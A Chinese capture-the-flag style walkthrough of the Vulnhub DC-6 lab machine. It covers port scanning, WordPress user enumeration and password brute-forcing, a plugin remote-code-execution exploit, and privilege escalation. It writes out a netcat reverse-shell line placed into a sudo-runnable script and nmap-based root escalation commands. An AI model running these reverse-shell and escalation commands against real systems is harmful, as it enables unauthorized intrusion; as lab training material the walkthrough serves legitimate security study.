Vulnhub_DC-6靶机通关笔记
2021-01-19 11:31:45 Author: www.freebuf.com(查看原文) 阅读量:140 收藏

freeBuf

主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

Vulnhub提示:

1611010235_600610bb1f3f573d7d256.png!small

扫描靶机IP地址:nmap -sP 192.168.10.0/24

1611010312_60061108b4d876776ee2e.png!small

扫描端口信息:nmap -sV -p 1-65535 -A 192.168.10.129

1611010440_6006118840fe43f71aafa.png!small开放端口22,80

访问80端口发现URL被重定向到wordy

我们需要在host文件中添加

文件位置 /etc/hosts

1611010660_60061264a4c28ca946a86.png!small

可以访问到啦

1611010709_600612952edac0f42092d.png!small

扫描下目录结构吧,

御剑扫描

1611011738_6006169ac3a357562a00f.png!small

发现是wordpress站点

使用WPscan扫描

一款专注于wordpress站点扫描工具

wpscan -url wordy

1611011785_600616c96e185cd8e3b87.png!small

顺便枚举一下用户

1611011937_600617615d326140f16d5.png!small站点没发现什么漏洞,暴力破解尝试下

root@kali:~# wpscan --url wordy --enumerate u -P /usr/share/wordlists/rockyou.txt

破解很久没获取密码,这时候想起Vulnhub重要提示

root@kali:~# cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt

使用这个字典在尝试下暴力破解

root@kali:~# wpscan --url wordy --enumerate u -P /root/passwords.txt

获得密码

mark
helpdesk01

登录后台发现Activity on Wordy插件存在远程代码执行漏洞

1611019799_600636170786947e77fbb.png!small

利用远程代码执行命令漏洞步骤:

step1:打开burpsuite工具设置代理

1611019933_6006369d8f14bf15aaa62.png!small

step2:

1611019949_600636adc1fd25a5b4220.png!smallstep3:发送到重写模块1611020049_600637118af16ce3bca3a.png!small

step4:kali打开端口监听

1611020150_6006377675115872eb9ab.png!smallstep5:1611020166_60063786e92870c7a5f12.png!small利用成功获取到webshell

横向移动搜寻可以利用的信息

成功找到了graham的密码信息

1611020431_6006388fdb0e8a9176464.png!small

查看graham用户的sudo -l 权限,可以以jens 用户权限执行backups.sh脚本

1611020583_6006392741f4a4ab4780b.png!small

如果以jens身份执行反弹shell脚本,反弹回的则是jens用户的shell

1611021187_60063b8393840cdbeb103.png!smallecho “ nc -e /bin/bash 192.168.10.155 8888 " > backups.sh

kali 端监听 8888 端口

1611021298_60063bf28cc8ee517260e.png!small

sudo -u jens 以jens用户执行脚本,不加-u 则默认以root权限执行,那样当然是不能成功的

1611021327_60063c0f5279d3944ee7e.png!small

jens用户可以以 root权限执行 nmap 1611021444_60063c84d427ba0c9fff6.png!smallnmap 提权分为两种

旧版本上以进入交互提权

# 进入nmap的交互模式
nmap --interactive
# 执行sh,提权成功
!sh

新版本

echo 'os.execute("/bin/sh")' >/tmp/TF
sudo nmap --script=/tmp/TF

1611023232_6006438080b1d2f35cca3.png!small1611023332_600643e42c26a338e14cb.png!small1611023372_6006440c1569151a45a4a.png!small


文章来源: https://www.freebuf.com/articles/web/261226.html
如有侵权请联系:admin#unsafe.sh